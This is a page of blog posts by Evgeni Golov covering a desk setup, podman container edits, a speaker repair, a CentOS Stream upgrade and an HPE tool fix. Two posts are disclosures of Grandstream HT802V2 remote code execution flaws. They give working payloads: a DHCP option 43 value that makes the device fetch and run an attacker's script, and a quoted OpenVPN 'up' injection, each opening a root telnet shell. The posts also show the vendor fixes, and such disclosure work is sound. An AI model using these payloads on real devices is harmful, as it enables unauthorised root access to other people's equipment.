Search Results: "evgeni"

7 June 2025

Evgeni Golov: show your desk - 2025 edition

Back in 2020 I posted about my desk setup at home. Recently someone in our #remotees channel at work asked about WFH setups and given quite a few things changed in mine, I thought it's time to post an update. But first, a picture!

[Image: standing desk with a monitor, laptop etc.] (Yes, it's cleaner than usual, how could you tell?!)

desk
It's still the same Flexispot E5B, no change here. After 7 years (I bought mine in 2018) it still works fine. If I had to buy a new one, I'd probably get a four-legged one for more stability (they got quite affordable now), but there is no immediate need for that.

chair
It's still the IKEA Volmar. Again, no complaints here.

hardware
Now here we finally have some updates!

laptop
A Lenovo ThinkPad X1 Carbon Gen 12, Intel Core Ultra 7 165U, 32GB RAM, running Fedora (42 at the moment). It's connected to a Lenovo ThinkPad Thunderbolt 4 Dock. It just works.

workstation
It's still the P410, but mostly unused these days.

monitor
An AOC U2790PQU 27" 4K. I'm running it at 150% scaling, which works quite decently these days (no comparison to when I got it).

speakers
As the new monitor didn't want to take the old Dell soundbar, I have upgraded to a pair of Alesis M1Active 330 USB. They sound good and were not too expensive. I had to fix the volume control after some time though.

webcam
It's still the Logitech C920 Pro.

microphone
The built-in mic of the C920 is really fine, but to do conference-grade talks (and some podcasts), I decided to get something better. I got a FIFINE K669B, with a nice arm. It's not a Shure, for sure, but does the job well and Christian was quite satisfied with the results when we recorded the Debian and Foreman specials of Focus on Linux.

keyboard
It's still the ThinkPad Compact USB Keyboard with TrackPoint. I had to print a few fixes and replacement parts for it, but otherwise it's doing great. Seems Lenovo stopped making those, so I really shouldn't break it any further.

mouse
Logitech MX Master 3S. The surface of the old MX Master 2 got very sticky at some point and it had to be replaced.

other

notepad
I'm still terrible at remembering things, so I still write them down in an A5 notepad.

whiteboard
I've also added a (small) whiteboard on the wall right of the desk, mostly used for long-term todo lists.

coaster
Turns out Xeon-based coasters are super stable, so it lives on!

yubikey
Yepp, still a thing. Still USB-A because... reasons.

headphones
Still the Bose QC25, by now on the third set of ear cushions, but otherwise working great and the odd 15€ cushion replacement does not justify buying anything newer (which would have the same problem after some time, I guess). I did add a cheap (~10€) Bluetooth-to-headphone-jack dongle, so I can use them with my phone too (shakes fist at modern phones). And I do use the headphones more in meetings, as the Alesis speakers fill the room more with sound and thus sometimes produce a bit of an echo.

charger
The Bose need AAA batteries, and so do some other gadgets in the house, so there is a technoline BC 700 charger for AA and AAA on my desk these days.

light
Yepp, I've added an IKEA Tertial and an ALDI "face" light. No, I don't use them much.

KVM switch
I've "built" a KVM switch out of a USB switch, but given I don't use the workstation that often these days, the switch is also mostly unused.

14 May 2025

Evgeni Golov: running modified containers with podman

Everybody (who runs containers) knows this situation: you've been running happycontainer:stable for a while and it's been great but now something external changed and you need to adjust the code while there is still no release with the patch. I've encountered exactly this when our Home-Assistant stopped showing the presence of our cat correctly, but we've also been discussing this at work recently. Now the most obvious (to me?) solution would be to build a new container, based on the original one, and perform the modifications at build time. Something like this:
FROM happycontainer:stable
RUN curl … | patch -p1
But that's not interactive, and if you don't have a patch readily available, that's not what you want. (And I'll save you the idea of RUNing sed and friends to alter files!) You could run vim inside the container, but that requires vim to be installed there in the first place. And a reasonable configuration. And… Well, turns out podman can mount the root fs of a running container.
[root@sai ~]# podman mount homeassistant
/var/lib/containers/storage/overlay/f3ac502d97b5681989dff
And if you're running as non-root, you'll get an error:
[container@sai ~]$ podman mount homeassistant
Error: cannot run command "podman mount" in rootless mode, must execute `podman unshare` first
Luckily the solution is in the error message: use podman unshare.
[container@sai ~]$ podman unshare
[root@sai ~]# podman mount homeassistant
/home/container/.local/share/containers/storage/overlay/95d3809d53125e4d40ad05e52efaa5a48e6e61fe9b8a8478416ff44459c7eb31/merged
So in both cases (root and rootless) we get a path, which is the mounted root fs and we can edit things in there as we like.
[root@sai ~]# vi /home/container/.local/share/containers/storage/overlay/95d3809d53125e4d40ad05e52efaa5a48e6e61fe9b8a8478416ff44459c7eb31/merged/usr/src/homeassistant/homeassistant/components/surepetcare/binary_sensor.py
Once done, the container can be unmounted again, and the namespace left
[root@sai ~]# podman umount homeassistant
homeassistant
[root@sai ~]# exit
[container@sai ~]$
At this point we have modified the code inside the container, but the running process is still using the old code. If we restart the container now to restart the process, our changes will be lost. Instead, we can commit the changes as a new layer and tag the result.
[container@sai ~]$ podman commit homeassistant docker.io/homeassistant/home-assistant:stable
And now, when we restart the container, it will use the new code with our changes
[container@sai ~]$ systemctl --user restart homeassistant
Is this the best workflow you can get? Probably not. Does it work? Hell yeah!
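For reference, the whole round-trip as a single shell sketch (rootless setup, container name and the edited file path taken from the example above; adjust both for your own container):

podman unshare                                   # rootless only: enter the user namespace
MNT=$(podman mount homeassistant)                # prints the merged overlay path
vi "$MNT"/usr/src/homeassistant/homeassistant/components/surepetcare/binary_sensor.py
podman umount homeassistant
exit                                             # leave the user namespace again
podman commit homeassistant docker.io/homeassistant/home-assistant:stable
systemctl --user restart homeassistant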

4 April 2025

Gunnar Wolf: Naming things revisited

How long has it been since you last saw a conversation over different blogs syndicated at the same planet? Well, it's one of the good memories of the early 2010s. And there is an opportunity to re-engage! I came across Evgeni's post "naming things is hard" in Planet Debian. So, what names have I given my computers? I have had many since the mid-1990s. I also had several during the decade before that, but before Linux, my computers didn't have a formal name. Naming my computers is something nice Linux gave me. I have forgotten many. Some of the names I have used:

Evgeni Golov: naming things is hard

I got a new laptop (a Lenovo Thinkpad X1 Carbon Gen 12, more on that later) and as always with new pets, it needed a name. My naming scheme is roughly "short Japanese words that somehow relate to the machine". The current (other) machines at home are (not all really in use): Then, I happen to rent a few servers: I also had machines in the past, that are no longer with me: And also servers from the past: So, what shall I call the new one? It will be "juuni" (十二), which means 12. Creative, huh?

20 February 2025

Evgeni Golov: Unauthenticated RCE in Grandstream HT802V2 and probably others using gs_test_server DHCP vendor option

The Grandstream HT802V2 uses busybox' udhcpc for DHCP. When a DHCP event occurs, udhcpc calls a script (/usr/share/udhcpc/default.script by default) to further process the received data. On the HT802V2 this is used to (among other things) parse the data in DHCP option 43 (vendor) using the Grandstream-specific parser /sbin/parse_vendor.
 
        [ -n "$vendor" ] && {
                VENDOR_TEST_SERVER="`echo $vendor | parse_vendor | grep gs_test_server | cut -d' ' -f2`"
                if [ -n "$VENDOR_TEST_SERVER" ]; then
                        /app/bin/vendor_test_suite.sh $VENDOR_TEST_SERVER
                fi
        }
According to the documentation the format is <option_code><value_length><value>. The only documented option code is 0x01 for the ACS URL. However, if you pass other codes, these are accepted and parsed too. In particular, if you pass 0x05 you get gs_test_server, which is passed in a call to /app/bin/vendor_test_suite.sh. What's /app/bin/vendor_test_suite.sh? It's this nice script:
#!/bin/sh
TEST_SCRIPT=vendor_test.sh
TEST_SERVER=$1
TEST_SERVER_PORT=8080
cd /tmp
wget -q -t 2 -T 5 http://${TEST_SERVER}:${TEST_SERVER_PORT}/${TEST_SCRIPT}
if [ "$?" = "0" ]; then
    echo "Finished downloading ${TEST_SCRIPT} from http://${TEST_SERVER}:${TEST_SERVER_PORT}"
    chmod +x ${TEST_SCRIPT}
        corefile_dec ${TEST_SCRIPT}
        if [ "`head -n 1 ${TEST_SCRIPT}`" = "#!/bin/sh" ]; then
                echo "Starting GS Test Suite..."
                ./${TEST_SCRIPT} http://${TEST_SERVER}:${TEST_SERVER_PORT}
        fi
fi
It uses the passed value to construct the URL http://<gs_test_server>:8080/vendor_test.sh and download it using wget. We probably can construct a gs_test_server value in a way that wget overwrites some system file, like it was suggested in CVE-2021-37915. But we also can just let the script download the file and execute it for us. The only hurdle is that the downloaded file gets decrypted using corefile_dec and the result needs to have #!/bin/sh as the first line to be executed. I have no idea how the encryption works. But luckily we already have a shell using the OpenVPN exploit and can use /bin/encfile to encrypt things! The result gets correctly decrypted by corefile_dec back to the needed payload. That means we can take a simple payload like:
#!/bin/sh
# you need exactly that shebang, yes
telnetd -l /bin/sh -p 1270 &
Encrypt it using encfile and place it on a webserver as vendor_test.sh. The test machine has the IP 192.168.42.222 and python3 -m http.server 8080 runs the webserver on the right port. This means the value of DHCP option 43 needs to be 05, 14 (the length of the string being the IP address) and 192.168.42.222. In Python:
>>> server = "192.168.42.222"
>>> ":".join([f'{y:02x}' for y in [5, len(server)] + [ord(x) for x in server]])
'05:0e:31:39:32:2e:31:36:38:2e:34:32:2e:32:32:32'
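If the DHCP server on the test network happens to be dnsmasq (an assumption for illustration, the post doesn't say what served the option), handing out that value could look roughly like this:

# dnsmasq.conf sketch (hypothetical setup, not part of the original post)
# option 43 = 0x05, length 0x0e, then "192.168.42.222" as ASCII bytes
dhcp-option=43,05:0e:31:39:32:2e:31:36:38:2e:34:32:2e:32:32:32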
So we set DHCP option 43 to 05:0e:31:39:32:2e:31:36:38:2e:34:32:2e:32:32:32 and trigger a DHCP run (/etc/init.d/udhcpc restart if you have a shell, or a plain reboot if you don't). And boom, root shell on port 1270 :)

As mentioned earlier, this is closely related to CVE-2021-37915, where a binary was downloaded via TFTP from the gdb_debug_server NVRAM variable or via HTTP from the gs_test_server NVRAM variable. Both of these variables were controllable using the existing gs_config interface after authentication. But using DHCP for the same thing is much nicer, as it removes the need for authentication completely :)

Affected devices

Fix

After disclosing this issue to Grandstream, they have issued a new firmware release (1.0.3.10) which modifies /app/bin/vendor_test_suite.sh to
#!/bin/sh
TEST_SCRIPT=vendor_test.sh
TEST_SERVER=$1
TEST_SERVER_PORT=8080
VENDOR_SCRIPT="/tmp/run_vendor.sh"
cd /tmp
wget -q -t 2 -T 5 http://${TEST_SERVER}:${TEST_SERVER_PORT}/${TEST_SCRIPT}
if [ "$?" = "0" ]; then
    echo "Finished downloading ${TEST_SCRIPT} from http://${TEST_SERVER}:${TEST_SERVER_PORT}"
    chmod +x ${TEST_SCRIPT}
    prov_image_dec --in ${TEST_SCRIPT} --out ${VENDOR_SCRIPT}
    if [ "`head -n 1 ${VENDOR_SCRIPT}`" = "#!/bin/sh" ]; then
        echo "Starting GS Test Suite..."
        chmod +x ${VENDOR_SCRIPT}
        ${VENDOR_SCRIPT} http://${TEST_SERVER}:${TEST_SERVER_PORT}
    fi
fi
The crucial part is that now prov_image_dec is used for the decoding, which actually checks for a signature (like on the firmware image itself), thus preventing loading of malicious scripts.

Timeline

12 February 2025

Evgeni Golov: Authenticated RCE via OpenVPN Configuration File in Grandstream HT802V2 and probably others

I have a Grandstream HT802V2 running firmware 1.0.3.5 and while playing around with the VPN settings realized that the sanitization of the "Additional Options" field done for CVE-2020-5739 is not sufficient. Before the fix for CVE-2020-5739, /etc/rc.d/init.d/openvpn did
echo "$(nvram get 8460)" | sed 's/;/\n/g' >> ${CONF_FILE}
After the fix it does
echo "$(nvram get 8460)" | sed -e 's/;/\n/g' | sed -e '/script-security/d' -e '/^[ ]*down /d' -e '/^[ ]*up /d' -e '/^[ ]*learn-address /d' -e '/^[ ]*tls-verify /d' -e '/^[ ]*client-[dis]*connect /d' -e '/^[ ]*route-up/d' -e '/^[ ]*route-pre-down /d' -e '/^[ ]*auth-user-pass-verify /d' -e '/^[ ]*ipchange /d' >> ${CONF_FILE}
That means it deletes all lines that either contain script-security or start with a set of options that allow command execution. Looking at the OpenVPN configuration template (/etc/openvpn/openvpn.conf), it already uses up and therefore sets script-security 2, so injecting that is unnecessary. Thus if one can somehow inject "/bin/ash -c 'telnetd -l /bin/sh -p 1271'" in one of the command-executing options, a reverse shell will be opened. The filtering looks for lines that start with zero or more occurrences of a space, followed by the option name (up, down, etc), followed by another space. While OpenVPN happily accepts tabs instead of spaces in the configuration file, I wasn't able to inject a tab via either the web interface or SSH/gs_config. However, OpenVPN also allows quoting, which is only documented for parameters, but works just as well for option names too. That means that instead of
up "/bin/ash -c 'telnetd -l /bin/sh -p 1271'"
from the original exploit by Tenable, we write
"up" "/bin/ash -c 'telnetd -l /bin/sh -p 1271'"
this will still be a valid OpenVPN configuration statement, but the filtering in /etc/rc.d/init.d/openvpn won't catch it and the resulting OpenVPN configuration will include the exploit:
# grep -E '(up|script-security)' /etc/openvpn.conf
up /etc/openvpn/openvpn.up
up-restart
;group nobody
script-security 2
"up" "/bin/ash -c 'telnetd -l /bin/sh -p 1271'"
And with that, once the OpenVPN connection is established, a reverse shell is spawned:
/ # uname -a
Linux HT8XXV2 4.4.143 #108 SMP PREEMPT Mon May 13 18:12:49 CST 2024 armv7l GNU/Linux
/ # id
uid=0(root) gid=0(root)
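To see why the quoting trick slips through, you can run a sample line through the relevant part of the pre-1.0.3.10 filter yourself (a quick sketch reproducing only the up rule from above):

$ printf '%s\n' 'up "/bin/ash -c foo"' '"up" "/bin/ash -c foo"' | sed -e '/^[ ]*up /d'
"up" "/bin/ash -c foo"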
Affected devices

Fix

After disclosing this issue to Grandstream, they have issued a new firmware release (1.0.3.10) which modifies the filtering to the following:
echo "$(nvram get 8460)" | sed -e 's/;/\n/g' | \
                           sed -e '/script-security/d' \
                               -e '/^["'\'' \f\v\r\n\t]*down["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*up["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*learn-address["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*tls-verify["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*tls-crypt-v2-verify["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*client-[dis]*connect["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*route-up["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*route-pre-down["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*auth-user-pass-verify["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*ipchange["'\'' \f\v\r\n\t]/d' >> ${CONF_FILE}
So far I was unable to inject any further commands in this block.

Timeline

14 September 2024

Evgeni Golov: Fixing the volume control in an Alesis M1Active 330 USB Speaker System

I've a set of Alesis M1Active 330 USB on my desk to listen to music. They were relatively inexpensive (~100€), have USB and sound pretty good for their size/price. They were also sitting on my desk unused for a while, because the left speaker didn't produce any sound. Well, almost any. If you'd move the volume knob long enough you might have found a position where the left speaker would work a bit, but it'd be quieter than the right one and stop working again after some time. Pretty unacceptable when you want to listen to music.

Given the right speaker was working just fine and the left would work a bit when the volume knob was moved, I was quite certain which part was to blame: the potentiometer. So just open the right speaker (it contains all the logic boards, power supply, etc), take out the broken potentiometer, buy a new one, replace, done. Sounds easy?

Well, to open the speaker you gotta loosen 8 (!) screws on the back. At least it's not glued, right? Once the screws are removed you can pull out the back plate, which will bring the power supply, USB controller, sound amplifier and cables, lots of cables: two pairs of thick cables, one to each driver, one thin pair for the power switch and two sets of "WTF is this, I am not going to trace pinouts today", one with a 6 pin plug, one with a 5 pin one. Unplug all of these! Yes, they are plugged, nice. Nope, still no friggin' idea how to get to the potentiometer.

If you trace the "thin pair" and "WTF1" cables, you see they go inside a small wooden box structure. So we have to pull the thing from the front? Okay, let's remove the plastic part of the knob. Right, this looks like a potentiometer. Unscrew it. No, no need for a Makita wrench, I just didn't have anything else in the right size (10mm).

[Image: Alesis M1Active 330 USB speaker with a Makita wrench where the volume knob is]

Still, no movement. Let's look again from the inside! Oh ffs, there are six more screws inside, holding the front. Away with them! Just need a very long PH1 screwdriver. Now you can slowly remove the part of the front where the potentiometer is. Be careful, the top tweeter is mounted to the front, not the main case, and so is the headphone jack, without an obvious way to detach it. But you can move away the front far enough to remove the small PCB with the potentiometer and the LED.

[Image: Alesis M1Active 330 USB speaker open]

Great, this was the easy part! The only thing printed on the potentiometer is "A10K". 10K is easy -- 10kOhm. A?! Wikipedia says "A" means "logarithmic", but only if made in the US or Asia. In Europe that'd be "linear". "B" in US/Asia means "linear", in Europe "logarithmic". Do I need to tap the sign again? (The sign is a print of XKCD#927.) My multimeter says in this case it's something like logarithmic. On the right channel anyway, the left one is more like a chopping board. And what's this green box at the end? Oh right, this thing also turns the power on and off. So it's a power switch.

Where the fuck do I get a logarithmic 10kOhm stereo potentiometer with a power switch? And then in the exact right size too?! Of course not at any of the big German electronics pharmacies. But AliExpress saves the day, again. It's even the same color!

Soldering without pulling the cable out of the case was a bit challenging, but I've managed it and now have stereo sound again. Yay!

PS: Don't operate this thing open to try it out. 230V are dangerous!

22 May 2024

Evgeni Golov: Upgrading CentOS Stream 8 to CentOS Stream 9 using Leapp

Warning to the Planet Debian readers: the following post might shock you, if you're used to Debian's smooth upgrades using only the package manager.

Leapp?!
Contrary to distributions like Debian and Fedora, RHEL can't be upgraded using the package manager alone. Instead there is a tool called Leapp that takes care of orchestrating the update and also includes a set of checks whether a system can be upgraded at all. Have a look at the RHEL documentation about upgrading if you want more details on the process itself. You might have noticed that the title of this post says "CentOS Stream" but here I am talking about RHEL. This is mostly because Leapp was originally written with RHEL in mind.

Upgrading CentOS 7 to EL8
When people started pondering upgrading their CentOS 7 installations, AlmaLinux started the ELevate project to allow upgrading CentOS 7 to CentOS Stream 8 but also to AlmaLinux 8, Rocky 8 or Oracle Linux 8. ELevate was essentially Leapp with patches to allow working on CentOS, which has different package signature keys, different OS release versioning, etc. Sadly these patches were never merged back into Leapp.

Making Leapp work with CentOS Stream 8 (and other distributions)
At some point I noticed that things weren't moving and EL8 to EL9 upgrades were coming closer (and I had my own systems that I wanted to be able to upgrade in place). Annoyed-Evgeni-Development is best development? Not sure, but it produced a set of patches that allowed some movement: However, this is not yet the end of the story. At least "convert dot-less CentOS versions to X.999" is open, and another followup would be needed if we go that route. But I don't expect this to be merged soon, as the patch is technically wrong - yet it makes things mostly work. The big problem here is that CentOS Stream doesn't have X.Y versioning, just X as it's a constant stream with no point releases. Leapp however relies on X.Y versioning to know which package changes it needs to perform. Pretending CentOS Stream 8 is "RHEL" 8.999 works if you assume that Stream is always ahead of RHEL. This is however a CentOS only problem. I still need to properly test that, but I'd expect things to work fine with upstream Leapp on AlmaLinux/Rocky if you feed it the right signature and repository data.

Actually upgrading CentOS Stream 8 to CentOS Stream 9 using Leapp
Like I've already teased in my HPE rant, I've actually used that code to upgrade virt01.conova.theforeman.org to CentOS Stream 9. I've also used it to upgrade a server at home that's responsible for running important containers like Home Assistant and UniFi. So it's absolutely battle tested and production grade! It's also hungry for kittens. As mentioned above, you can't just use upstream Leapp, but I have a Copr: evgeni/leapp.
# dnf copr enable evgeni/leapp
# dnf install leapp leapp-upgrade-el8toel9
Apart from the software, we'll also need to tell it which repositories to use for the upgrade.
# vim /etc/leapp/files/leapp_upgrade_repositories.repo
[c9-baseos]
name=CentOS Stream $releasever - BaseOS
metalink=https://mirrors.centos.org/metalink?repo=centos-baseos-9-stream&arch=$basearch&protocol=https,http
gpgkey=file:///etc/pki/rpm-gpg/RPM-GPG-KEY-centosofficial
gpgcheck=1
repo_gpgcheck=0
metadata_expire=6h
countme=1
enabled=1
[c9-appstream]
name=CentOS Stream $releasever - AppStream
metalink=https://mirrors.centos.org/metalink?repo=centos-appstream-9-stream&arch=$basearch&protocol=https,http
gpgkey=file:///etc/pki/rpm-gpg/RPM-GPG-KEY-centosofficial
gpgcheck=1
repo_gpgcheck=0
metadata_expire=6h
countme=1
enabled=1
Depending on the setup and installed packages, more repositories might be needed. Just make sure that the $stream substitution is not used as Leapp doesn't override that and you'd end up with CentOS Stream 8 repos again. Once all that is in place, we can call leapp preupgrade and let it analyze the system. Ideally, the output will look like this:
# leapp preupgrade
 
============================================================
                      REPORT OVERVIEW                       
============================================================
Reports summary:
    Errors:                      0
    Inhibitors:                  0
    HIGH severity reports:       0
    MEDIUM severity reports:     0
    LOW severity reports:        3
    INFO severity reports:       3
Before continuing consult the full report:
    A report has been generated at /var/log/leapp/leapp-report.json
    A report has been generated at /var/log/leapp/leapp-report.txt
============================================================
                   END OF REPORT OVERVIEW                   
============================================================
But trust me, it won't ;-)

As mentioned above, Leapp analyzes the system before the upgrade. Some checks can completely inhibit the upgrade, while others will just be logged as "you better should have a look".

Firewalld Configuration AllowZoneDrifting Is Unsupported
EL7 and EL8 shipped with AllowZoneDrifting=yes, but since EL9 this is not supported anymore. As this can potentially break the networking of the system, the upgrade gets inhibited.

Newest installed kernel not in use
Admit it, you also don't reboot into every new kernel available! Well, Leapp won't let that pass and inhibits the upgrade.

Cannot perform the VDO check of block devices
In EL8 there are two ways to manage VDO: using the dedicated vdo tool and via LVM. If your system uses LVM (it should!) but not VDO, you probably don't have the vdo package installed. But then Leapp can't check if your LVM devices really aren't VDO without the vdo tooling and will inhibit the upgrade. So you gotta install vdo for it to find out that you don't use VDO.

LUKS encrypted partition detected
Yeah. Sorry. Using LUKS? Straight into the inhibit corner! But hey, if you don't use LUKS for / you can probably get away by deleting the inhibitwhenluks actor. That worked for me, but remember the kittens!

Really upgrading CentOS Stream 8 to CentOS Stream 9 using Leapp
The headings are getting silly, huh? Anyway, once leapp preupgrade is happy and doesn't throw any inhibitors anymore, the actual (real?) upgrade can be done by calling leapp upgrade. This will download all necessary packages and create an intermediate initramfs that contains all the things needed for the upgrade and ask you to reboot. Once booted, the upgrade itself takes somewhere between 5 and 10 minutes. Then another minute or 5 to relabel your disks with the new SELinux policy. And three reboots (into the upgrade initramfs, into SELinux relabel, into real OS) of a ProLiant DL325 - 5 minutes each? And then for good measure another one, to flip SELinux from permissive to enforcing. Are we done yet? Nope. There are a few post-upgrade tasks you get to do yourself. Yes, the switching of SELinux back to enforcing is one of them. Please don't forget it.

Using the system after the upgrade
A customer once said "We're not running those systems for the sake of running systems, but for the sake of running some application ontop of them". This is very true.

libvirt doesn't support Spice/QXL
In EL9, support for Spice/QXL was dropped, so if you try to boot a VM using it, libvirt will nicely error out with
Error starting domain: unsupported configuration: domain configuration does not support video model 'qxl'
Interestingly, because multiple parts of the VM are invalid, you can't edit it in virt-manager (at least the one in Fedora 39) as removing/fixing one part requires applying the new configuration which is still invalid. So virsh edit <vm> it is! Look for entries like
    <channel type='spicevmc'>
      <target type='virtio' name='com.redhat.spice.0'/>
      <address type='virtio-serial' controller='0' bus='0' port='2'/>
    </channel>
    <graphics type='spice' autoport='yes'>
      <listen type='address'/>
    </graphics>
    <audio id='1' type='spice'/>
    <video>
      <model type='qxl' ram='65536' vram='65536' vgamem='16384' heads='1' primary='yes'/>
      <address type='pci' domain='0x0000' bus='0x00' slot='0x01' function='0x0'/>
    </video>
    <redirdev bus='usb' type='spicevmc'> 
      <address type='usb' bus='0' port='2'/> 
    </redirdev> 
    <redirdev bus='usb' type='spicevmc'> 
      <address type='usb' bus='0' port='3'/> 
    </redirdev>
and either just delete these entries or (better) replace them with VNC/cirrus:
    <graphics type='vnc' port='-1' autoport='yes'>
      <listen type='address'/>
    </graphics>
    <audio id='1' type='none'/>
    <video>
      <model type='cirrus' vram='16384' heads='1' primary='yes'/>
      <address type='pci' domain='0x0000' bus='0x00' slot='0x01' function='0x0'/>
    </video>
Podman needs re-login to private registries
One of the machines I've updated runs Podman and pulls containers from GitHub which are marked as private. To do so, I have a personal access token that I've used to login to ghcr.io. After the CentOS Stream 9 upgrade (which included an upgrade to Podman 5), pulls stopped working with authentication/permission errors. No idea what exactly happened, but a simple podman login fixed this issue quickly.
$ echo ghp_token | podman login ghcr.io -u <user> --password-stdin
shim has an el8 tag
One of the documented post-upgrade tasks is to verify that no EL8 packages are installed, and to remove those if there are any. However, when you do this, you'll notice that the shim-x64 package has an EL8 version: shim-x64-15-15.el8_2.x86_64. That's because the same build is used in both CentOS Stream 8 and CentOS Stream 9. Confusing, but it should really not be uninstalled if you want the machine to boot ;-)

Are we done yet?
Yes! That's it. Enjoy your CentOS Stream 9!
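PS: a quick way to list what's still tagged el8 after the upgrade - with the shim package being the expected exception - could be something like this (a sketch, not from the official docs; tune the pattern to your liking):

# rpm -qa | grep '\.el8' | grep -v '^shim-x64'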

15 May 2024

Evgeni Golov: Using HPONCFG on CentOS Stream 9 with OpenSSL 3.2

Today I've updated an HPE ProLiant DL325 G10 from CentOS Stream 8 to CentOS Stream 9 (details on that to follow) and realized that hponcfg was broken afterwards. As I do not have a support contract with HPE, I couldn't just yell at them in private, so I am doing this in public now ;-)
# hponcfg
HPE Lights-Out Online Configuration utility
Version 5.6.0 Date 11/30/2020 (c) 2005,2020 Hewlett Packard Enterprise Development LP
Error: Unable to locate SSL library.
       Install latest SSL library to use HPONCFG.
Welp, what the heck? But wait, 5.6.0 from 2020 looks old, let's update this first! hponcfg is part of the "Management Component Pack" (at least if you're not running RHEL or SLES where you get it via the "Service Pack for ProLiant" which requires a support contract) and can be downloaded from the Software Delivery Repository. The Software Delivery Repository tells you to configure it in /etc/yum.repos.d/mcp.repo as
[mcp]
name=Management Component Pack
baseurl=http://downloads.linux.hpe.com/repo/mcp/dist/dist_ver/arch/project_ver
enabled=1
gpgcheck=0
gpgkey=file:///etc/pki/rpm-gpg/GPG-KEY-mcp
gpgcheck=0? Suuure! Plain HTTP? Suuure! But it gets better! When you look at https://downloads.linux.hpe.com/repo/mcp/centos/ (you have to substitute dist with your distribution!) you'll see that there is no 9 folder and thus no packages for CentOS (Stream) 9. There are however folders for Oracle, Rocky and Alma. Phew. Let's take one of these!
[mcp]
name=Management Component Pack
baseurl=https://downloads.linux.hpe.com/repo/mcp/rocky/9/x86_64/current/
enabled=1
gpgcheck=1
gpgkey=https://downloads.linux.hpe.com/repo/mcp/GPG-KEY-mcp
dnf upgrade hponcfg updates it to hponcfg-6.0.0-0.x86_64 and:
# hponcfg
HPE Lights-Out Online Configuration utility
Version 6.0.0 Date 10/30/2022 (c) 2005,2022 Hewlett Packard Enterprise Development LP
Error: Unable to locate SSL library.
       Install latest SSL library to use HPONCFG.
Fuck. ldd doesn't show hponcfg being linked to libssl, so did they dlopen() it at runtime and fuck something up? ltrace to the rescue!
# ltrace hponcfg
 
popen("strings /bin/openssl | grep 'Ope"..., "r")            = 0x621700
fgets("OpenSSL 3.2.1 30 Jan 2024\n", 256, 0x621700)          = 0x7ffd870e2e10
strstr("OpenSSL 3.2.1 30 Jan 2024\n", "OpenSSL 3.0")         = nil
 
WAT? They run strings /bin/openssl | grep 'OpenSSL' and compare the result with "OpenSSL 3.0"?! Sure, OpenSSL 3.2 in EL9 is rather fresh and didn't hit RHEL/Oracle/Alma/Rocky yet, but surely there are better ways to check for a compatible version of OpenSSL than THIS?! Anyway, I am not going to downgrade my OpenSSL. Neither will I patch it to pretend to be 3.0. But I can patch the hponcfg binary!
# vim /sbin/hponcfg
<go to line 146>
<replace 3.0 with 3.2>
:x
Yes, I used vim. Yes, it works. No, I won't guarantee this won't kill a kitten somewhere.
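If you'd rather script that than open a binary in vim, the same-length replacement can also be done with sed on a copy (a sketch matching the ./hponcfg invocation below, with the usual no-kitten guarantees):

# cp /sbin/hponcfg .
# sed -i 's/OpenSSL 3\.0/OpenSSL 3.2/' ./hponcfg   # same length, so nothing shifts inside the binary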
# ./hponcfg
HPE Lights-Out Online Configuration utility
Version 6.0.0 Date 10/30/2022 (c) 2005,2022 Hewlett Packard Enterprise Development LP
Firmware Revision = 2.44 Device type = iLO 5 Driver name = hpilo
USAGE:
  hponcfg  -?
  hponcfg  -h
  hponcfg  -m minFw
  hponcfg  -r [-m minFw] [-u username] [-p password]
  hponcfg  -b [-m minFw] [-u username] [-p password]
  hponcfg  [-a] -w filename [-m minFw] [-u username] [-p password]
  hponcfg  -g [-m minFw] [-u username] [-p password]
  hponcfg  -f filename [-l filename] [-s namevaluepair] [-v] [-m minFw] [-u username] [-p password]
  hponcfg  -i [-l filename] [-s namevaluepair] [-v] [-m minFw] [-u username] [-p password]
  -h,  --help           Display this message
  -?                    Display this message
  -r,  --reset          Reset the Management Processor to factory defaults
  -b,  --reboot         Reboot Management Processor without changing any setting
  -f,  --file           Get/Set Management Processor configuration from "filename"
  -i,  --input          Get/Set Management Processor configuration from the XML input
                        received through the standard input stream.
  -w,  --writeconfig    Write the Management Processor configuration to "filename"
  -a,  --all            Capture complete Management Processor configuration to the file.
                        This should be used along with '-w' option
  -l,  --log            Log replies to "filename"
  -v,  --xmlverbose     Display all the responses from Management Processor
  -s,  --substitute     Substitute variables present in input config file
                        with values specified in "namevaluepairs"
  -g,  --get_hostinfo   Get the Host information
  -m,  --minfwlevel     Minimum firmware level
  -u,  --username       iLO Username
  -p,  --password       iLO Password
For comparison, here is the diff --text output:
# diff -u --text /sbin/hponcfg ./hponcfg
--- /sbin/hponcfg   2022-08-02 01:07:55.000000000 +0000
+++ ./hponcfg   2024-05-15 09:06:54.373121233 +0000
@@ -143,7 +143,7 @@
 helpget_hostinforesetwriteconfigallfileinputlogminfwlevelxmlverbosesubstitutetimeoutdbgverbosityrebootusernamepasswordlibpath%Ah*Ag7Ar=AwIAaMAfRAiXAl\AmgAvrAs At Ad Ab Au Ap Azhgrbaw:f:il:m:vs:t:d:z:u:p:tmpXMLinputFile%2d.xmlw+Error: Syntax Error - Invalid options present.
 =O@aQ@aQ@aQ@aQ@aQ@aQ@aQ@aQ@aQ@aQ@aQ@aQ@aQ@aQ@aQ@aQ@aQ@aQ@aQ@aQ@aQ@aQ@aQ@aQ@aQ@aQ@aQ@aQ@aQ@aQ@aQ@aQ@aQ@ M@ M@aQ@ M@aQ@ N@ M@ N@ P@aQ@aQ@ M@ M@aQ@aQ@LN@aQ@ M@ O@ M@ M@ M@ M@aQ@aQ@ M@<!----><LOGINUSER_LOGINPASSWORD<LOGIN USER_LOGIN="%s" PASSWORD="%s"ERROR: LOGIN tag is missing.
 >ERROR: LOGIN end tag is missing.
-strings    grep 'OpenSSL 1'   grep 'OpenSSL 3'OpenSSL 1.0OpenSSL 1.1OpenSSL 3.0which openssl 2>&1/usr/bin/opensslOpenSSL location - %s
